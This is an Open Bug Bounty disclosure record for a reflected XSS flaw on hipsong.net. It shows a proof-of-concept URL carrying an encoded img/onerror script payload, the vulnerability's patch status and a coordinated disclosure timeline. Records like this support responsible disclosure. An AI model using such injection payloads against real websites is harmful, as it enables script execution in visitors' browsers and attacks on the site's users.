hipsong.net XSS vulnerability

2016-09-14T16:02:00
ID OBB:181669
Type openbugbounty
Reporter npuser500
Modified 2017-01-17T12:57:00

Description

Vulnerable URL:
http://hipsong.net/search2.php?search=%3Cimg%20src=1%20onerror=confirm%28%22OPENBUGBOUNTY%22%29%3E.htm/%3Cimg%20src=1%20onerror=confirm%28%22OPENBUGBOUNTY%22%29%3E
Details:

Description| Value
---|---
Patched:| Yes, at 11.01.2017
Latest check for patch:| 11.01.2017 13:09 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 366617
VIP website status:| No
Check hipsong.net SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 14 September, 2016 16:02 GMT
Generic security notifications sent to website owner| 14 September, 2016 16:04 GMT
Vulnerability details disclosed by researcher| 7 December, 2016 16:14 GMT
Vulnerability patched by the website owner| 17 January, 2017 12:57 GMT